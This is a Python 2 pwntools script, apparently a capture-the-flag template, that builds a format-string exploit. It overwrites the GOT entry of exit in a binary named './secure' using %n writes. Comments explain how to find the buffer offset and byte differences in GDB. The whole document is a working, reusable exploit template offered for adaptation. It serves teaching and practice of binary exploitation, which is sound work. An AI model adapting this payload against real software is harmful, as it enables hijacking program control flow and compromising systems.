Format String/printf Vulnerability

RootOfTheNull, Aug 14th, 2018
#!/usr/bin/env python

'''
John Hammond
FULL DISCLAIMER:
 This aims to be a general purpose script... but you will need to modify it
 as you work with exploring the problem you are on. There are a couple of steps of
 manual testing, and I try to explain these in the comments below.
'''

# NOTE: this script is written for Python 2 pwntools (it concatenates the output of
# p32() with str and uses the print statement); under Python 3 p32() returns bytes.
from pwn import *

context.log_level = 'critical'

elf = ELF('./secure')

# These are the addresses in memory that you want to overwrite. YOU WILL NEED TO CHANGE THESE
# You can find these with pwntools (elf.got['<function_name>']) or `readelf -s <binary_name>`
overwrite = elf.got['exit'] # this is the address that you want to OVERWRITE...
to_write = 0x08048713 # this is the value that you want TO OVERWRITE IT WITH...



# For initial testing, you will first need to discover MANUALLY..:
### This is the size of the buffer that you can write into. We use this for padding.
# (You can find this with Hopper or IDA if you don't have source code given).
length_of_buffer = 64
### This is the offset of our buffer on the stack. (the position of AAAA for testing)
offset = 35

### These values come from testing in GDB.... YOU WILL NEED TO DO THIS MANUALLY
testing_value = 30  # use this when replacing

first_difference = 0x2e # this is the value you see replacing the GOT entry after FIRST test
                        # (the LAST FOUR BYTES hex, the LOW BYTES)
first_difference -= testing_value    # NO NEED TO CHANGE THIS LINE
second_difference = 0x8731 # this is the value you see the SECOND time you test.
                           # (the first FOUR BYTES, the HIGH BYTES)
second_difference -= testing_value # NO NEED TO CHANGE THIS LINE


# --------------------------------------------------------------------------------------------

# These variables help do the math for you. DO NOT CHANGE THESE VARIABLES
LOW_BYTES = str(hex(to_write)[-4:])
LOW_BYTES_DIFFERENCE = int(LOW_BYTES,16) - first_difference
# The leading '1' makes the high-half count wrap past the bytes already printed for the low half
HIGH_BYTES = '1'+hex(to_write)[2:-4].zfill(4)
HIGH_BYTES_DIFFERENCE = int(HIGH_BYTES, 16) - second_difference

# Convenience function for padding, no need to change
def pad(s): return s + "X" * ( length_of_buffer - len(s) )


#### You will have to tweak this to test in GDB.
exploit = ""
exploit += p32(overwrite)                  # this will be filled with the LOW BYTES DIFFERENCE...
exploit += p32(overwrite+1)                # this fills HIGH BYTES (+1 for next pos. on stack)...
exploit += 'AAAABBBB'                      #
# exploit += '%<#change_to_test_offset>$x' ### USED FOR TESTING OFFSET... NOT NEEDED FOR PAYLOAD

# exploit += '%'+str(offset)+'$'+str(testing_value)+'x'         ### USED FOR FIRST TEST...
                                                                ### (COMMENT OUT THE 2ND TEST BELOW!!)
exploit += '%'+str(offset)+'$'+str(LOW_BYTES_DIFFERENCE)+'x'    # use this line for payload
                                                                # when the variables above are filled
exploit += '%'+str(offset)+'$n' # used to write the value!

# exploit += '%'+str(offset+1)+'$'+str(testing_value)+'x'       ### USED FOR SECOND TEST...
                                                                ### (KEEP THE FIRST TEST ABOVE)
exploit += '%'+str(offset+1)+'$'+str(HIGH_BYTES_DIFFERENCE)+'x' # use this line for payload
                                                                # when the variables above are filled
exploit += '%'+str(offset+1)+'$n' # used to write the value!


print exploit